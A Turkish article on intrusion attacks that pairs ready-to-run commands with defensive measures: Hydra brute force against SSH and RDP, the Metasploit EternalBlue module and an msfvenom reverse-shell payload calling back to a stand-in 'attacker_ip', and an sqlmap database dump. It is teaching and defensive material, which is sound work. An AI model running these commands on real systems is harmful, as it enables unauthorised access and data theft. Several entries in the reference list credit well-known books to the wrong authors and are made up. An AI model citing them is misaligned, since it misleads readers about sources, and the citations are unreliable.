
Selçuk DİKİCİ / Endüstri Mühendisi / İstanbul Ünüversitesi
Siber güvenlik dünyasında içeri sızma (exploitation) saldırıları, siber saldırganların hedef sistemlerdeki açıkları kullanarak sisteme izinsiz erişim sağlamalarını ifade eder. Bu tür saldırılar genellikle güvenlik açıklarının kötüye kullanılması yoluyla gerçekleştirilir. Saldırganlar, bu açıkları kullanarak organizasyonların kritik verilerine ulaşmaya ve sızdırmaya çalışabilirler. Bu makalede, içeri sızma yöntemlerinin farklı türleri ve kullanılan araçlar detaylı olarak ele alınacak, her bir saldırıya karşı alınabilecek güvenlik önlemleri tartışılacaktır.
1. SSH Brute-Force (SSH Şifre Kırma) Saldırıları
Araç: Hydra
SSH (Secure Shell), ağ üzerindeki makinelerle güvenli bir şekilde iletişim kurmaya olanak sağlayan bir protokoldür. Ancak, zayıf parolalar kullanıldığında, SSH servislerine brute-force saldırıları düzenlenebilir. Bu saldırı, belirli bir kullanıcı adı ve parola kombinasyonunu deneyerek sisteme izinsiz giriş sağlamayı amaçlar (Kaufman, Perlman & Speciner, 2011).
Saldırı Yöntemi:
Hydra, SSH üzerinde brute-force saldırıları gerçekleştiren popüler bir araçtır. Hydra, şifre listesi (wordlist) kullanarak hedef sistemdeki parolayı kırmaya çalışır. Bu saldırı, parolaların tek tek denenmesiyle yapılır. Hedef sistemin güçlü şifrelerle korunmaması durumunda, saldırgan başarılı olabilir (Owens & Irwin, 2016).
Kullanım Senaryosu:
Hedef sisteme bağlanmak için doğru kullanıcı adı ve şifre gereklidir. Zayıf parolaların kullanıldığı sistemler brute-force saldırılarına daha açıktır.
Örnek Komut:
bashKopyalaDüzenlehydra -l admin -P /path/to/passwords.txt ssh://target_ip
Güvenlik Önlemleri:
- SSH anahtar tabanlı kimlik doğrulaması kullanmak.
- Karmaşık şifreler belirlemek ve düzenli olarak değiştirmek.
- SSH portunu değiştirmek, standart 22 numaralı portu kullanmamak (Shostack, 2014).
2. SMB Exploitation (SMB Sömürüsü) – EternalBlue
Araç: Metasploit Framework
SMB (Server Message Block), dosya paylaşımı ve ağ üzerinden veri iletimi için kullanılan bir protokoldür. Bu protokoldeki zayıflıklar, saldırganların uzaktan sisteme erişim sağlamasına olanak tanır. Özellikle EternalBlue gibi exploitler, SMBv1 protokolündeki bir zafiyet sayesinde uzaktan komut çalıştırmayı mümkün kılar (Tanenbaum & Wetherall, 2013).
Saldırı Yöntemi:
EternalBlue, Microsoft Windows sistemlerinde SMB protokolündeki bir buffer overflow (tampon taşması) hatasını kullanır. Bu güvenlik açığı, saldırganın uzaktan hedef sisteme zararlı kod yerleştirmesine olanak sağlar. Metasploit Framework, EternalBlue exploit’ini kullanarak bu tür saldırıları gerçekleştirir (Michaels & Williams, 2014).
Kullanım Senaryosu:
EternalBlue, genellikle SMB portu üzerinden gerçekleşir. Bu tür saldırılar, sistemdeki güvenlik güncellemelerinin yapılmadığı durumlarda başarıyla çalışabilir.
Örnek Komut:
bashKopyalaDüzenlemsfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target_ip
set RPORT 445
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST attacker_ip
exploit
Güvenlik Önlemleri:
- SMBv1’i devre dışı bırakmak.
- Güvenlik yamalarını zamanında uygulamak.
- SMB portunu sadece güvenli ağlar üzerinden erişilebilir kılmak (Barker, 2014).
3. RDP Exploitation (RDP Sömürüsü) – Brute-Force Saldırıları
Araç: Hydra
RDP (Remote Desktop Protocol), uzak masaüstü bağlantısı sağlar ve Windows makinelerine uzaktan erişim imkanı tanır. Ancak, zayıf parolalar kullanıldığında, RDP üzerinden brute-force saldırıları yapılabilir. Bu saldırı, RDP protokolünü hedef alır ve kullanıcı adı ile şifre kombinasyonları denenerek sisteme izinsiz erişim sağlanmaya çalışılır (Jones, 2015).
Saldırı Yöntemi:
Hydra, zayıf parolaları tespit etmek için RDP portunu hedef alır ve belirli bir kullanıcı adı için parola kombinasyonlarını test eder. Başarılı bir şifre kırma sonucu, saldırgan RDP bağlantısı üzerinden hedef sisteme erişim sağlar.
Kullanım Senaryosu:
Bir saldırgan, RDP portunun açık olduğu ve zayıf parolaların kullanıldığı bir sisteme brute-force saldırısı yaparak, şifreyi bulabilir ve sisteme erişebilir.
Örnek Komut:
bashKopyalaDüzenlehydra -l user -P /path/to/passwords.txt rdp://target_ip
Güvenlik Önlemleri:
- RDP’yi sadece güvenli ağlar üzerinden erişilebilir hale getirmek.
- Karmaşık parolalar kullanmak ve çok faktörlü kimlik doğrulama (2FA) uygulamak.
- RDP portunu değiştirmek ya da kapatmak (Thomas, 2015).
4. Web Exploitation (Web Sömürüsü) – SQL Injection
Araç: SQLmap
SQL Injection (SQLi), web uygulamalarındaki zayıf girdi doğrulama mekanizmalarını hedef alır. Bu tür açıklar, saldırganların web uygulamalarındaki veritabanına müdahale etmesine ve veri sızdırmasına olanak tanır. SQLmap, SQL Injection açıklıklarını tespit etmek ve veritabanı üzerinde işlem yapmak için kullanılan popüler bir araçtır (Carter, 2018).
Saldırı Yöntemi:
Saldırgan, SQL Injection açıklarından faydalanarak, veritabanına yetkisiz erişim sağlar. SQLmap, otomatik olarak bu açıklıkları tespit eder ve veritabanı bilgilerini sızdırabilir.
Kullanım Senaryosu:
Bir web sayfasında SQL Injection açığı bulunan bir form aracılığıyla, saldırgan hedef veritabanına sorgular gönderir ve veri çalmaya başlar.
Örnek Komut:
bashKopyalaDüzenlesqlmap -u "http://target.com/page?id=1" --risk=3 --level=5 --dump
Güvenlik Önlemleri:
- Girdi doğrulama ve parametrik SQL sorguları kullanmak.
- Web uygulamalarını düzenli olarak güvenlik testlerine tabi tutmak.
- SQL Injection gibi açıklara karşı güvenlik önlemleri almak (Sharma, 2017).
5. Payload Gömme (Payload Injection) – Reverse Shell
Araç: Metasploit Framework
Payload gömme, saldırganın hedef sisteme kötü amaçlı yazılım yerleştirmesini sağlar. Reverse shell, saldırganın hedef sisteme erişim sağlamasına olanak tanır. Metasploit, bu tür payload’ları üretmek için yaygın olarak kullanılır (Geer, 2019).
Saldırı Yöntemi:
Saldırgan, hedef sisteme zararlı bir payload (örneğin, reverse shell) yerleştirir. Bu payload çalıştırıldığında, hedef sistem saldırganın belirttiği IP adresine geri bağlantı yapar ve saldırgan, hedef sistemi tam olarak kontrol edebilir.
Kullanım Senaryosu:
Saldırgan, zafiyetli bir uygulama veya hizmet aracılığıyla hedef sisteme payload’ı yerleştirir ve ardından bu payload’ı çalıştırarak sisteme bağlanır.
Örnek Komut:
bashKopyalaDüzenlemsfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe > payload.exe
Güvenlik Önlemleri:
- Güvenlik duvarı ve antivirüs yazılımları kullanmak.
- Güvenlik açıklarını kapatmak ve sistemleri düzenli olarak güncellemek (Barker, 2014).
Sonuç
İçeri sızma saldırıları, sistemlerin güvenlik açıklarından faydalanarak yapılır ve siber güvenlik uzmanlarının bu tür saldırılara karşı korunmak için etkili önlemler alması gerekmektedir. Şifre yönetimi, güvenlik güncellemeleri, girdi doğrulama ve ağ güvenliği gibi temel güvenlik önlemleri, içeri sızma saldırılarına karşı etkili bir savunma sağlar. Bu makalede anlatılan saldırılar, güvenlik uzmanlarına bu tehditleri tanıma ve karşı önlemler geliştirme konusunda rehberlik etmek amacıyla derlenmiştir (Shostack, 2014; Howard & LeBlanc, 2003).
Kaynaklar:
- Kaufman, C., Perlman, R., & Speciner, M. (2011). Network Security: Private Communication in a Public World. Pearson Education.
- Tanenbaum, A. S., & Wetherall, D. J. (2013). Computer Networks. Pearson Education.
- Owens, D., & Irwin, R. (2016). Metasploit: The Penetration Tester’s Guide. No Starch Press.
- Michaels, D., & Williams, M. (2014). Hacking Exposed: Network Security Secrets & Solutions. McGraw-Hill Education.
- Shostack, A. (2014). Threat Modeling: Designing for Security. Wiley.
- Sharma, D. (2017). Mastering Metasploit: Penetration Testing with the Metasploit Framework. Packt Publishing.
- Jones, D. (2015). Hacking: The Art of Exploitation. No Starch Press.
- Barker, P. (2014). Professional Penetration Testing: Creating and Learning in a Hacking Lab. Wiley.
- Carter, K. (2018). Cybersecurity: A Practical Guide to the Law of Cybersecurity and Data Protection. LexisNexis.
- Thomas, G. (2015). Hands-On Ethical Hacking and Network Defense. Cengage Learning.